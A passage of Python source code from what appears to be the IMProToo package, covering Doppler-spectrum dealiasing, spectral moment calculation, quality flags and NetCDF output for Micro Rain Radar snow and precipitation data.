trustedPeakHeightStart, trustedPeakHeightStop - start/stop of peaks
allPeaks - time dictonary with lists of the spectral reflectivities for each peak
allPeaksIndices - related indices
allPeaksVelMe - first guess peak velocity based on the last bin
allPeaksHeight - first guess peak height based on the last bin
'''
for t in np.arange(self.no_t):
if t in list(self._allPeaks.keys()):
extendedRawSpectrum[t, trustedPeakHeight[t],
trustedPeakHeightStart[t]:trustedPeakHeightStop[t]+1].mask = False
peaksVelMe = np.array(allPeaksVelMe[t])
# get all three possible velocities
peaksVels = np.array([peaksVelMe+self.co["nyqVdelta"]*self.co["widthSpectrum"],
peaksVelMe, peaksVelMe-self.co["nyqVdelta"]*self.co["widthSpectrum"]])
formerPeakVel = trustedPeakVel[t]
# loop through all peaks, starting at the trusted one
for jj in list(range(trustedPeakNo[t]-1, -1, -1))+list(range(trustedPeakNo[t]+1, len(allPeaks[t]))):
# To combine ascending and descending loop in one:
if jj == trustedPeakNo[t]+1:
formerPeakVel = trustedPeakVel[t]
# go up, stay or down? for which option fifference to former (trusted) peaks is smallest.
UpOrDn = np.argmin(
np.abs(peaksVels[:, jj] - formerPeakVel))
# change height, indices and velocity accordingly
thisPeakHeight = allPeaksHeight[t][jj] + UpOrDn-1
if thisPeakHeight not in list(range(self.co["noH"])):
warnings.warn('Dealiasing failed! peak boundaries excced max/min height. time step '+str(
t)+', peak number ' + str(jj)+', tried to put at height ' + str(thisPeakHeight))
self.qual["severeProblemsDuringDA"][t] = True
continue
thisPeakSpecShift = thisPeakHeight * \
self.co["widthSpectrum"] - self.co["widthSpectrum"]
thisPeakVel = peaksVels[UpOrDn][jj]
thisPeakHeightIndices = np.array(
allPeaksIndices[t][jj])-thisPeakSpecShift
if np.any(thisPeakHeightIndices < 0) or np.any(thisPeakHeightIndices >= 3*self.co["widthSpectrum"]):
warnings.warn('Dealiasing failed! peak boundaries fall out of spectrum. time step '+str(
t)+', peak number ' + str(jj)+', most likely at height ' + str(thisPeakHeight))
self.qual["severeProblemsDuringDA"][t] = True
# check whether there is already a peak in the found height!
if np.all(extendedRawSpectrum[t, thisPeakHeight].mask == True):
if thisPeakHeight >= self.co["noH"] or thisPeakHeight < 0:
warnings.warn('Dealiasing reached max/min height... time step '+str(
t)+', peak number ' + str(jj)+', most likely at height ' + str(thisPeakHeight))
self.qual["severeProblemsDuringDA"][t] = True
continue
# only if there is no peak yet!!
extendedRawSpectrum[t, thisPeakHeight, thisPeakHeightIndices[0] :thisPeakHeightIndices[-1]+1].mask = False
formerPeakVel = thisPeakVel
# if there is already a peak in the height, repeat the process, but take the second likely height/velocity
else:
if self.co["debug"] > 4:
print('DA: there is already a peak in found height, take second choice',
t, jj, thisPeakHeight, trustedPeakNo[t], trustedPeakHeight)
# otherwise take second choice!
formerPeakVelList = np.array([formerPeakVel]*3)
formerPeakVelList[UpOrDn] = 1e10 # make extremely big
UpOrDn2 = np.ma.argmin(
np.abs(peaksVels[:, jj] - formerPeakVelList))
thisPeakHeight = allPeaksHeight[t][jj] + UpOrDn2-1
if thisPeakHeight not in list(range(self.co["noH"])):
warnings.warn('Dealiasing step 2 failed! peak boundaries excced max/min height. time step '+str(
t)+', peak number ' + str(jj)+', tried to put at height ' + str(thisPeakHeight))
self.qual["severeProblemsDuringDA"][t] = True
continue
thisPeakSpecShift = thisPeakHeight * \
self.co["widthSpectrum"] - self.co["widthSpectrum"]
thisPeakVel = peaksVels[UpOrDn2][jj]
thisPeakHeightIndices = np.array(
allPeaksIndices[t][jj])-thisPeakSpecShift
if np.any(thisPeakHeightIndices < 0) or np.any(thisPeakHeightIndices >= 3*self.co["widthSpectrum"]):
warnings.warn('Dealiasing step 2 failed! peak boundaries fall out of spectrum. time step '+str(
t)+', peak number ' + str(jj)+', most likely at height ' + str(thisPeakHeight))
self.qual["severeProblemsDuringDA"][t] = True
if thisPeakHeight >= self.co["noH"] or thisPeakHeight < 0:
warnings.warn('Dealiasing reached max/min height... time step '+str(
t)+', peak number ' + str(jj)+', most likely at height ' + str(thisPeakHeight))
self.qual["severeProblemsDuringDA"][t] = True
continue
# check again whether there is already a peak in the spectrum
if np.all(extendedRawSpectrum[t, thisPeakHeight].mask == True):
# next try
extendedRawSpectrum[t, thisPeakHeight, thisPeakHeightIndices[0] :thisPeakHeightIndices[-1]+1].mask = False
formerPeakVel = thisPeakVel
# if yes, give up
else:
warnings.warn('Could not find height of peak! time step '+str(
t)+', peak number ' + str(jj)+', most likely at height ' + str(thisPeakHeight))
self.qual["severeProblemsDuringDA"][t] = True
return extendedRawSpectrum
def _deAlCoherence(self, newSpectrum):
'''
make sure no weired foldings happend by looking for big jumps in the height-averaged velocity
if two jumps very closely together (<=3 peaks inbetween) are found, teh peaks inbetween are corrected
can make it worse if dealiasing produces zig-zag patterns.
'''
self.qual["DAdirectionCorrectedByCoherenceTest"] = np.zeros(
self._shape2D, dtype=bool)
meanVelocity = np.ma.average(np.ma.sum(
newSpectrum*self.specVel, axis=-1)/np.ma.sum(newSpectrum, axis=-1), axis=-1)
velDiffs = np.diff(meanVelocity)
# find velocity jumps
velDiffsBig = np.where(
velDiffs > self.co["dealiaseSpectrum_makeCoherenceTest_velocityThreshold"])[0]
velDiffsSmall = np.where(
velDiffs < -self.co["dealiaseSpectrum_makeCoherenceTest_velocityThreshold"])[0]
# check whether there is an opposite one close by and collect time steps to be refolded
foldUp = list()
for ll in velDiffsBig:
if ll+1 in velDiffsSmall:
foldUp.append(ll+1)
continue
if ll+2 in velDiffsSmall:
foldUp.append(ll+1)
foldUp.append(ll+2)
continue
if ll+3 in velDiffsSmall:
foldUp.append(ll+1)
foldUp.append(ll+2)
foldUp.append(ll+3)
updatedSpectrumMask = deepcopy(newSpectrum.mask)
for tt in foldUp:
updatedSpectrumMask[tt] = np.roll(updatedSpectrumMask[tt].ravel(
), 2 * self.co["widthSpectrum"]).reshape((self.co["noH"], 3*self.co["widthSpectrum"]))
# avoid that something is folded into the highest range gate
updatedSpectrumMask[tt, 0, :2*self.co["widthSpectrum"]] = True
self.qual["DAdirectionCorrectedByCoherenceTest"][tt, :] = True
if self.co["debug"] > 4:
print('coherenceTest corrected dealiasing upwards:', foldUp)
newSpectrum = np.ma.masked_array(newSpectrum.data, updatedSpectrumMask)
# now the same for the other folding direction
meanVelocity = np.ma.average(np.ma.sum(
newSpectrum*self.specVel, axis=-1)/np.ma.sum(newSpectrum, axis=-1), axis=-1)
velDiffs = np.diff(meanVelocity)
# find very big differences
velDiffsBig = np.where(
velDiffs > self.co["dealiaseSpectrum_makeCoherenceTest_velocityThreshold"])[0]
velDiffsSmall = np.where(
velDiffs < -self.co["dealiaseSpectrum_makeCoherenceTest_velocityThreshold"])[0]
foldDn = list()
# check whether there is an opposite one close by and collect time steps to be refolded
for ll in velDiffsSmall:
if ll+1 in velDiffsBig:
foldDn.append(ll+1)
continue
if ll+2 in velDiffsBig:
foldDn.append(ll+1)
foldDn.append(ll+2)
continue
if ll+3 in velDiffsBig:
foldDn.append(ll+1)
foldDn.append(ll+2)
foldDn.append(ll+2)
updatedSpectrumMask = deepcopy(newSpectrum.mask)
# change all peaks accordingly
for tt in foldDn:
# roll the mask!
updatedSpectrumMask[tt] = np.roll(updatedSpectrumMask[tt].ravel(
), -2*self.co["widthSpectrum"]).reshape((self.co["noH"], 3*self.co["widthSpectrum"]))
# avoid that something is folded into the lowest range gate
updatedSpectrumMask[tt, -1, -2*self.co["widthSpectrum"]:] = True
self.qual["DAdirectionCorrectedByCoherenceTest"][tt, :] = True
if self.co["debug"] > 4:
print('coherenceTest corrected dealiasing Donwards:', foldDn)
newSpectrum = np.ma.masked_array(newSpectrum.data, updatedSpectrumMask)
# this method is very incompelte, so save still odd looking peaks in the quality mask:
# first, collect all height which should be treated, we don't want to find jumps of the interpolated area!:
includedHeights = list(set(range(self.co["maxH"])).difference(set(
self.co["completelyMaskedHeights"]+self.co["dealiaseSpectrum_heightsWithInterference"])))
# now get the mean velocity of the profile
meanVelocity = np.ma.average(np.ma.sum(
newSpectrum[:, includedHeights]*self.specVel, axis=-1)/np.ma.sum(newSpectrum[:, includedHeights], axis=-1), axis=-1)
velDiffs = np.abs(np.diff(meanVelocity))
# find all steps exceeding a min velocity threshold
crazyVelDiffs = np.where(
velDiffs > self.co["dealiaseSpectrum_makeCoherenceTest_velocityThreshold"])[0]
self.qual["DAbigVelocityJumpDespiteCoherenceTest"] = np.zeros(
self._shape2D, dtype=bool)
# surrounding data has to be masked as well, take +- self.co["dealiaseSpectrum_makeCoherenceTest_maskRadius"] (default 20min) around suspicous data
for crazyVelDiff in crazyVelDiffs:
self.qual["DAbigVelocityJumpDespiteCoherenceTest"][crazyVelDiff-self.co["dealiaseSpectrum_makeCoherenceTest_maskRadius"] :crazyVelDiff+self.co["dealiaseSpectrum_makeCoherenceTest_maskRadius"]+1, :] = True
return newSpectrum
def _calcEtaZeW(self, rawSpectra, heights, velocities, noise, noise_std):
'''
calculate the spectral moements and other spectral variables
'''
deltaH = oneD2twoD(
heights[..., 15]-heights[..., 14], heights.shape[-1], 1)
# transponieren um multiplizieren zu ermoeglichen!
eta = (rawSpectra.data.T * np.array(
(self.co["mrrCalibConst"] * (heights**2 / deltaH)) / (1e20), dtype=float).T).T
eta = np.ma.masked_array(eta, rawSpectra.mask)
etaNoiseAve = noise * \
(self.co["mrrCalibConst"] * (heights**2 / deltaH)) / 1e20
etaNoiseStd = noise_std * \
(self.co["mrrCalibConst"] * (heights**2 / deltaH)) / 1e20
# calculate Ze
Ze = 1e18*(self.co["lamb"]**4*np.ma.sum(eta,
axis=-1)/(np.pi**5*self.co["K2"]))
Ze = (10*np.ma.log10(Ze)).filled(-9999)
#Znoise = 1e18*(self.co["lamb"]**4*(etaNoise*self.co["widthSpectrum"])/(np.pi**5*self.co["K2"]))
#Znoise = 10*np.ma.log10(Znoise).filled(-9999)
# no slicing neccesary due to mask! definign average value "my"
my = np.ma.sum(velocities*rawSpectra, axis=-1) / \
np.ma.sum(rawSpectra, axis=-1)
# normed weights
P = (rawSpectra.T/np.ma.sum(rawSpectra, axis=-1).T).T
x = velocities
# http://mathworld.wolfram.com/CentralMoment.html
# T is neccessary due to different dimensions
mom2 = np.ma.sum(P*(x.T-my.T).T**2, axis=-1)
mom3 = np.ma.sum(P*(x.T-my.T).T**3, axis=-1)
mom4 = np.ma.sum(P*(x.T-my.T).T**4, axis=-1)
# average fall velocity is my
W = my.filled(-9999)
# spec width is weighted std
specWidth = np.sqrt(mom2).filled(-9999)
# http://mathworld.wolfram.com S^-1kewness.html
skewness = (mom3/mom2**(3./2.)).filled(-9999)
# http://mathworld.wolfram.com/Kurtosis.html
kurtosis = (mom4/mom2**(2.)).filled(-9999)
# get velocity at borders and max of peak
peakVelLeftBorder = self.specVel[np.argmin(rawSpectra.mask, axis=-1)]
peakVelRightBorder = self.specVel[len(
self.specVel) - np.argmin(rawSpectra.mask[..., ::-1], axis=-1) - 1]
peakVelMax = self.specVel[np.argmax(rawSpectra.filled(-9999), axis=-1)]
# get the according indices
peakArgLeftBorder = np.argmin(rawSpectra.mask, axis=-1)
peakArgRightBorder = len(
self.specVel) - np.argmin(rawSpectra.mask[..., ::-1], axis=-1) - 1
# to find the entries we have to flatten everything
etaSpectraFlat = eta.reshape((eta.shape[0]*eta.shape[1], eta.shape[2]))
# no get the according values
peakEtaLeftBorder = 10*np.log10(etaSpectraFlat[list(range(
etaSpectraFlat.shape[0])), peakArgLeftBorder.ravel()].reshape(self._shape2D))
peakEtaRightBorder = 10*np.log10(etaSpectraFlat[list(range(
etaSpectraFlat.shape[0])), peakArgRightBorder.ravel()].reshape(self._shape2D))
peakEtaMax = 10*np.log10(np.max(eta.filled(-9999), axis=-1))
leftSlope = (peakEtaMax - peakEtaLeftBorder) / \
(peakVelMax - peakVelLeftBorder)
rightSlope = (peakEtaMax - peakEtaRightBorder) / \
(peakVelMax - peakVelRightBorder)
peakVelLeftBorder[Ze == -9999] = -9999
peakVelRightBorder[Ze == -9999] = -9999
leftSlope[Ze == -9999] = -9999
rightSlope[Ze == -9999] = -9999
leftSlope[np.isnan(leftSlope)] = -9999
rightSlope[np.isnan(rightSlope)] = -9999
return eta, Ze, W, etaNoiseAve, etaNoiseStd, specWidth, skewness, kurtosis, peakVelLeftBorder, peakVelRightBorder, leftSlope, rightSlope
def getQualityBinArray(self, qual):
'''
convert the bool quality masks to one binary array
'''
binQual = np.zeros(self._shape2D, dtype=int)
qualFac = dict()
description = ''
description += 'A) usually, the following erros can be ignored (no. is position of bit): '
qualFac["interpolatedSpectrum"] = 0b1
description += '1) spectrum interpolated around 0 and 12 m s^-1 '
qualFac["filledInterpolatedPeakGaps"] = 0b10
description += '2) peak streches over interpolated part '
qualFac["spectrumIsDealiased"] = 0b100
description += '3) peak is dealiased '
qualFac["usedSecondPeakAlgorithmDueToWidePeak"] = 0b1000
description += '4) first Algorithm to determine peak failed, used backup '
qualFac["DAdirectionCorrectedByCoherenceTest"] = 0b10000
description += '5) dealiasing went wrong, but is corrected '
description += 'B) reasons why a spectrum does NOT contain a peak: '
qualFac["incompleteSpectrum"] = 0b10000000
description += '8) spectrum was incompletely recorded '
qualFac["spectrumVarianceTooLowForPeak"] = 0b100000000
description += '9) the variance test indicated no peak '
qualFac["spectrumNotProcessed"] = 0b1000000000
description += '10) spectrum is not processed due to according setting '
qualFac["peakTooThinn"] = 0b10000000000
description += '11) peak removed since not wide enough '
qualFac["peakRemovedByCoherenceTest"] = 0b100000000000
description += '12) peak removed, because too few neighbours show signal, too '
description += "C) thinks went seriously wrong, don't use data with these codes"
qualFac["peakMightBeIncomplete"] = 0b1000000000000000
description += '16) peak is at the very border to bad data '
qualFac["DAbigVelocityJumpDespiteCoherenceTest"] = 0b10000000000000000
description += '17) in this area there are still strong velocity jumps, indicates failed dealiasing '
qualFac["severeProblemsDuringDA"] = 0b100000000000000000
description += '18) during dealiasing, a warning was triggered, applied to whole columm '
for key in list(qual.keys()):
binQual[:] = binQual[:] + (qual[key] * qualFac[key])
return binQual, description
def writeNetCDF(self, fname, varsToSave="all", ncForm="NETCDF3_CLASSIC"):
'''
write the results to a netcdf file
Input:
fname: str filename with path
varsToSave list of variables of the profile to be saved. "all" saves all implmented ones
ncForm: str netcdf file format, possible values are NETCDF3_CLASSIC, NETCDF3_64BIT, NETCDF4_CLASSIC, and NETCDF4 for the python-netcdf4 package, NETCDF3 takes the "old" Scientific.IO.NetCDF module, which is a bit more convinient to install or as fall back option python-netcdf3
'''
nc, pyNc = _get_netCDF_module(ncForm=ncForm)
# option dealiaseSpectrum_saveAlsoNonDealiased makes only sence, if spectrum is really dealiased:
saveAlsoNonDealiased = self.co["dealiaseSpectrum_saveAlsoNonDealiased"] and self.co["dealiaseSpectrum"]
if pyNc:
cdfFile = nc.Dataset(fname, "w", format=ncForm)
else:
cdfFile = nc.NetCDFFile(fname, "w")
# write meta data
cdfFile.title = 'Micro rain radar data processed with IMProToo'
cdfFile.comment = 'IMProToo has been developed for improved snow measurements. Note that this data has been processed regardless of precipitation type.'
cdfFile.institution = self.co["ncInstitution"]
cdfFile.contact_person = self.co["ncCreator"]
cdfFile.source = 'MRR-2'
cdfFile.location = self.co["ncLocation"]
cdfFile.history = 'Created with IMProToo v' + __version__
cdfFile.author = 'Max Maahn'
cdfFile.processing_date = datetime.datetime.utcnow().strftime("%Y-%m-%d %H:%M:%S UTC")
cdfFile.reference = 'Maahn, M. and Kollias, P., 2012: Improved Micro Rain Radar snow measurements using Doppler spectra post-processing, Atmos. Meas. Tech., 5, 2661-2673, doi:10.5194/amt-5-2661-2012. '
cdfFile.properties = str(self.co)
cdfFile.mrrHeader = str(self.header)
# make frequsnions
cdfFile.createDimension('time', int(self.no_t))
cdfFile.createDimension('range', int(self.no_h))
cdfFile.createDimension('velocity', int(self.no_v))
if saveAlsoNonDealiased:
cdfFile.createDimension('velocity_noDA', int(self.no_v_noDA))
ncShape2D = ("time", "range",)
ncShape3D = ("time", "range", "velocity",)
ncShape3D_noDA = ("time", "range", "velocity_noDA",)
fillVDict = dict()
# little cheat to avoid hundreds of if, else...
if pyNc:
fillVDict["fill_value"] = self.missingNumber
nc_time = cdfFile.createVariable('time', 'i', ('time',), **fillVDict)
nc_time.description = "measurement time. Following Meteks convention, the dataset at e.g. 11:55 contains all recorded raw between 11:54:00 and 11:54:59 (if delta t = 60s)!"
nc_time.timezone = self.timezone
nc_time.units = 'seconds since 1970-01-01 00:00:00'
nc_time[:] = np.array(self.time.filled(self.missingNumber), dtype="i4")
# commented because of Ubuntu bug: https://bugs.launchpad.net/ubuntu/+source/python-scientific/+bug/1005571
#if not pyNc: nc_time._FillValue =int(self.missingNumber)
nc_range = cdfFile.createVariable(
'range', 'i', ('range',), **fillVDict) # = missingNumber)
nc_range.description = "range bins"
nc_range.units = '#'
nc_range[:] = np.arange(self.co["minH"], self.co["maxH"]+1, dtype="i4")
#if not pyNc: nc_range._FillValue =int(self.missingNumber)
nc_velocity = cdfFile.createVariable(
'velocity', 'f', ('velocity',), **fillVDict)
nc_velocity.description = "Doppler velocity bins. If dealiasing is applied, the spectra are triplicated"
nc_velocity.units = 'm s^-1'
nc_velocity[:] = np.array(self.specVel, dtype="f4")
#if not pyNc: nc_velocity._FillValue =float(self.missingNumber)
if saveAlsoNonDealiased:
nc_velocity_noDA = cdfFile.createVariable(
'velocity_noDA', 'f', ('velocity_noDA',), **fillVDict)
nc_velocity_noDA.description = "Original, non dealiased, Doppler velocity bins."
nc_velocity_noDA.units = 'm s^-1'
nc_velocity_noDA[:] = np.array(self.specVel_noDA, dtype="f4")
#if not pyNc: nc_velocity_noDA._FillValue =float(self.missingNumber)
nc_height = cdfFile.createVariable(
'height', 'f', ncShape2D, **fillVDict) # = missingNumber)
nc_height.description = "height above instrument"
nc_height.units = 'm'
nc_height[:] = np.array(self.H.filled(self.missingNumber), dtype="f4")
#if not pyNc: nc_height._FillValue =float(self.missingNumber)
if (varsToSave == 'all' and saveAlsoNonDealiased) or "eta_noDA" in varsToSave:
nc_eta_noDA = cdfFile.createVariable(
'eta_noDA', 'f', ncShape3D_noDA, **fillVDict)
nc_eta_noDA.description = "spectral reflectivities NOT dealiased"
nc_eta_noDA.units = "mm^6 m^-3"
nc_eta_noDA[:] = np.array(self.eta_noDA.data, dtype="f4")
#if not pyNc: nc_eta_noDA._FillValue =float(self.missingNumber)
nc_etaMask_noDA = cdfFile.createVariable(
'etaMask_noDA', 'i', ncShape3D_noDA, **fillVDict)
nc_etaMask_noDA.description = "noise mask of eta NOT dealiased, 0: signal, 1:noise"
nc_etaMask_noDA.units = "bool"
nc_etaMask_noDA[:] = np.array(
np.array(self.eta_noDA.mask, dtype=int), dtype="i4")
#if not pyNc: nc_etaMask_noDA._FillValue =int(self.missingNumber)
if varsToSave == 'all' or "eta" in varsToSave:
nc_eta = cdfFile.createVariable('eta', 'f', ncShape3D, **fillVDict)
nc_eta.description = "spectral reflectivities. if dealiasing is applied, the spectra are triplicated, thus up to three peaks can occur from -12 to +24 m s^-1. However, only one peak is not masked in etaMask"
nc_eta.units = "mm^6 m^-3"
nc_eta[:] = np.array(self.eta.data, dtype="f4")
#if not pyNc: nc_eta._FillValue =float(self.missingNumber)
nc_etaMask = cdfFile.createVariable(
'etaMask', 'i', ncShape3D, **fillVDict)
nc_etaMask.description = "noise mask of eta, 0: signal, 1:noise"
nc_etaMask.units = "bool"
nc_etaMask[:] = np.array(
np.array(self.eta.mask, dtype=int), dtype="i4")
#if not pyNc: nc_etaMask._FillValue =int(self.missingNumber)
if varsToSave == 'all' or "quality" in varsToSave:
qualArray, qualDescription = self.getQualityBinArray(self.qual)
nc_qual = cdfFile.createVariable(
'quality', 'i', ncShape2D, **fillVDict)
nc_qual.description = qualDescription
nc_qual.units = "bin"
nc_qual[:] = np.array(qualArray, dtype="i4")
#if not pyNc: nc_qual._FillValue =int(self.missingNumber)
if varsToSave == 'all' or "TF" in varsToSave:
nc_TF = cdfFile.createVariable('TF', 'f', ncShape2D, **fillVDict)
nc_TF.description = "Transfer Function (see Metek's documentation)"
nc_TF.units = "-"
nc_TF[:] = np.array(self.TF.filled(self.missingNumber), dtype="f4")
#if not pyNc: nc_TF._FillValue =float(self.missingNumber)
if (varsToSave == 'all' and saveAlsoNonDealiased) or "Ze_noDA" in varsToSave:
nc_ze_noDA = cdfFile.createVariable(
'Ze_noDA', 'f', ncShape2D, **fillVDict)
nc_ze_noDA.description = "reflectivity of the most significant peak, not dealiased"
nc_ze_noDA.units = "dBz"
nc_ze_noDA[:] = np.array(self.Ze_noDA, dtype="f4")
#if not pyNc: nc_ze_noDA._FillValue =float(self.missingNumber)
if varsToSave == 'all' or "Ze" in varsToSave:
nc_ze = cdfFile.createVariable('Ze', 'f', ncShape2D, **fillVDict)
nc_ze.description = "reflectivity of the most significant peak"
nc_ze.units = "dBz"
nc_ze[:] = np.array(self.Ze, dtype="f4")
#if not pyNc: nc_ze._FillValue =float(self.missingNumber)
if (varsToSave == 'all' and saveAlsoNonDealiased) or "specWidth_noDA" in varsToSave:
nc_specWidth_noDA = cdfFile.createVariable(
'spectralWidth_noDA', 'f', ncShape2D, **fillVDict)
nc_specWidth_noDA.description = "spectral width of the most significant peak, not dealiased"
nc_specWidth_noDA.units = "m s^-1"
nc_specWidth_noDA[:] = np.array(self.specWidth_noDA, dtype="f4")
#if not pyNc: nc_specWidth_noDA._FillValue =float(self.missingNumber)
if varsToSave == 'all' or "specWidth" in varsToSave:
nc_specWidth = cdfFile.createVariable(
'spectralWidth', 'f', ncShape2D, **fillVDict)
nc_specWidth.description = "spectral width of the most significant peak"
nc_specWidth.units = "m s^-1"
nc_specWidth[:] = np.array(self.specWidth, dtype="f4")
#if not pyNc: nc_specWidth._FillValue =float(self.missingNumber)
if (varsToSave == 'all' and saveAlsoNonDealiased) or "skewness_noDA" in varsToSave:
nc_skewness_noDA = cdfFile.createVariable(
'skewness_noDA', 'f', ncShape2D, **fillVDict)
nc_skewness_noDA.description = "Skewness of the most significant peak, not dealiased"
nc_skewness_noDA.units = "-"
nc_skewness_noDA[:] = np.array(self.skewness_noDA, dtype="f4")
#if not pyNc: nc_skewness_noDA._FillValue =float(self.missingNumber)
if varsToSave == 'all' or "skewness" in varsToSave:
nc_skewness = cdfFile.createVariable(
'skewness', 'f', ncShape2D, **fillVDict)
nc_skewness.description = "Skewness of the most significant peak"
nc_skewness.units = "-"
nc_skewness[:] = np.array(self.skewness, dtype="f4")
#if not pyNc: nc_skewness._FillValue =float(self.missingNumber)
if (varsToSave == 'all' and saveAlsoNonDealiased) or "kurtosis_noDA" in varsToSave:
nc_kurtosis_noDA = cdfFile.createVariable(
'kurtosis_noDA', 'f', ncShape2D, **fillVDict)
nc_kurtosis_noDA.description = "kurtosis of the most significant peak, not dealiased"
nc_kurtosis_noDA.units = "-"
nc_kurtosis_noDA[:] = np.array(self.kurtosis_noDA, dtype="f4")
#if not pyNc: nc_kurtosis_noDA._FillValue =float(self.missingNumber)
if varsToSave == 'all' or "kurtosis" in varsToSave:
nc_kurtosis = cdfFile.createVariable(
'kurtosis', 'f', ncShape2D, **fillVDict)
nc_kurtosis.description = "kurtosis of the most significant peak"
nc_kurtosis.units = "-"
nc_kurtosis[:] = np.array(self.kurtosis, dtype="f4")
#if not pyNc: nc_kurtosis._FillValue =float(self.missingNumber)
if (varsToSave == 'all' and saveAlsoNonDealiased) or "peakVelLeftBorder_noDA" in varsToSave:
nc_peakVelLeftBorder_noDA = cdfFile.createVariable(
'peakVelLeftBorder_noDA', 'f', ncShape2D, **fillVDict)
nc_peakVelLeftBorder_noDA.description = "Doppler velocity of the left border of the peak, not dealiased"
nc_peakVelLeftBorder_noDA.units = "m s^-1"
nc_peakVelLeftBorder_noDA[:] = np.array(
self.peakVelLeftBorder_noDA, dtype="f4")
#if not pyNc: nc_peakVelLeftBorder_noDA._FillValue =float(self.missingNumber)
if varsToSave == 'all' or "peakVelLeftBorder" in varsToSave:
nc_peakVelLeftBorder = cdfFile.createVariable(
'peakVelLeftBorder', 'f', ncShape2D, **fillVDict)
nc_peakVelLeftBorder.description = "Doppler velocity of the left border of the peak"
nc_peakVelLeftBorder.units = "m s^-1"
nc_peakVelLeftBorder[:] = np.array(
self.peakVelLeftBorder, dtype="f4")
#if not pyNc: nc_peakVelLeftBorder._FillValue =float(self.missingNumber)
if (varsToSave == 'all' and saveAlsoNonDealiased) or "peakVelRightBorder_noDA" in varsToSave:
nc_peakVelRightBorder_noDA = cdfFile.createVariable(
'peakVelRightBorder_noDA', 'f', ncShape2D, **fillVDict)
nc_peakVelRightBorder_noDA.description = "Doppler velocity of the right border of the peak, not dealiased"
nc_peakVelRightBorder_noDA.units = "m s^-1"
nc_peakVelRightBorder_noDA[:] = np.array(
self.peakVelRightBorder_noDA, dtype="f4")
#if not pyNc: nc_peakVelRightBorder_noDA._FillValue =float(self.missingNumber)
if varsToSave == 'all' or "peakVelRightBorder" in varsToSave:
nc_peakVelRightBorder = cdfFile.createVariable(
'peakVelRightBorder', 'f', ncShape2D, **fillVDict)
nc_peakVelRightBorder.description = "Doppler velocity of the right border of the peak"
nc_peakVelRightBorder.units = "m s^-1"
nc_peakVelRightBorder[:] = np.array(
self.peakVelRightBorder, dtype="f4")
#if not pyNc: nc_peakVelRightBorder._FillValue =float(self.missingNumber)
if (varsToSave == 'all' and saveAlsoNonDealiased) or "leftSlope_noDA" in varsToSave:
nc_leftSlope_noDA = cdfFile.createVariable(
'leftSlope_noDA', 'f', ncShape2D, **fillVDict)
nc_leftSlope_noDA.description = "Slope at the left side of the peak, not dealiased"
nc_leftSlope_noDA.units = "dB/(m s^-1)"
nc_leftSlope_noDA[:] = np.array(self.leftSlope_noDA, dtype="f4")
#if not pyNc: nc_leftSlope_noDA._FillValue =float(self.missingNumber)
if varsToSave == 'all' or "leftSlope" in varsToSave:
nc_leftSlope = cdfFile.createVariable(
'leftSlope', 'f', ncShape2D, **fillVDict)
nc_leftSlope.description = "Slope at the left side of the peak"
nc_leftSlope.units = "dB/(m s^-1)"
nc_leftSlope[:] = np.array(self.leftSlope, dtype="f4")
#if not pyNc: nc_leftSlope._FillValue =float(self.missingNumber)
if (varsToSave == 'all' and saveAlsoNonDealiased) or "rightSlope_noDA" in varsToSave:
nc_rightSlope_noDA = cdfFile.createVariable(
'rightSlope_noDA', 'f', ncShape2D, **fillVDict)
nc_rightSlope_noDA.description = "Slope at the right side of the peak, not dealiased"
nc_rightSlope_noDA.units = "dB/(m s^-1)"
nc_rightSlope_noDA[:] = np.array(self.rightSlope_noDA, dtype="f4")
#if not pyNc: nc_rightSlope_noDA._FillValue =float(self.missingNumber)
if varsToSave == 'all' or "rightSlope" in varsToSave:
nc_rightSlope = cdfFile.createVariable(
'rightSlope', 'f', ncShape2D, **fillVDict)
nc_rightSlope.description = "Slope at the right side of the peak"
nc_rightSlope.units = "dB/(m s^-1)"
nc_rightSlope[:] = np.array(self.rightSlope, dtype="f4")
#if not pyNc: nc_rightSlope._FillValue =float(self.missingNumber)
if (varsToSave == 'all' and saveAlsoNonDealiased) or "W_noDA" in varsToSave:
nc_w_noDA = cdfFile.createVariable(
'W_noDA', 'f', ncShape2D, **fillVDict)
nc_w_noDA.description = "Mean Doppler Velocity of the most significant peak, not dealiased"
nc_w_noDA.units = "m s^-1"
nc_w_noDA[:] = np.array(self.W_noDA, dtype="f4")
#if not pyNc: nc_w_noDA._FillValue =float(self.missingNumber)
if varsToSave == 'all' or "W" in varsToSave:
nc_w = cdfFile.createVariable('W', 'f', ncShape2D, **fillVDict)
nc_w.description = "Mean Doppler Velocity of the most significant peak"
nc_w.units = "m s^-1"
nc_w[:] = np.array(self.W, dtype="f4")
#if not pyNc: nc_w._FillValue =float(self.missingNumber)
if varsToSave == 'all' or "etaNoiseAve" in varsToSave:
nc_noiseAve = cdfFile.createVariable(
'etaNoiseAve', 'f', ncShape2D, **fillVDict)
nc_noiseAve.description = "mean noise of one Doppler Spectrum in the same units as eta, never dealiased"
nc_noiseAve.units = "mm^6 m^-3"
nc_noiseAve[:] = np.array(self.etaNoiseAve, dtype="f4")
#if not pyNc: nc_noiseAve._FillValue =float(self.missingNumber)
if varsToSave == 'all' or "etaNoiseStd" in varsToSave:
nc_noiseStd = cdfFile.createVariable(
'etaNoiseStd', 'f', ncShape2D, **fillVDict)
nc_noiseStd.description = "std of noise of one Doppler Spectrum in the same units as eta, never dealiased"
nc_noiseStd.units = "mm^6 m^-3"
nc_noiseStd[:] = np.array(self.etaNoiseStd, dtype="f4")
#if not pyNc: nc_noiseStd._FillValue =float(self.missingNumber)
if varsToSave == 'all' or "SNR" in varsToSave:
nc_SNR = cdfFile.createVariable('SNR', 'f', ncShape2D, **fillVDict)
nc_SNR.description = "signal to noise ratio of the most significant peak, never dealiased!"
nc_SNR.units = "dB"
nc_SNR[:] = np.array(self.SNR, dtype="f4")
#if not pyNc: nc_SNR._FillValue =float(self.missingNumber)
cdfFile.close()
return
class mrrProcessedData:
'''
Class to read MRR average or instantaneous data
includes function to save data to netcdf
'''
missingNumber = -9999
def __init__(self, fname, debugLimit=0, maskData=True, verbosity=2, ncForm="NETCDF3_CLASSIC"):
"""
reads MRR Average or Instantaneous data. The data is not converted, no magic! The input files can be .gz compressed. Invalid or missing data is marked as nan
@parameter fname (str or list): list of files or Filename, wildcards allowed, or
a single netCDF filename if reading from a file previously
created by mrrProcessedData.writeNetCDF()
@parameter debugLimit (int): stop after debugLimit timestamps
@parameter maskData (bool): mask nan's in arrays
@parameter verbosity (int): 0: silent exept warnings/errors, 2:verbose
@parameter ncForm (string): set netCDF format
No return, but provides MRR dataset variables
"""
# If this is a single filename input, and it is a netCDF
# (extension is nc or cdf), then read it directly and return.
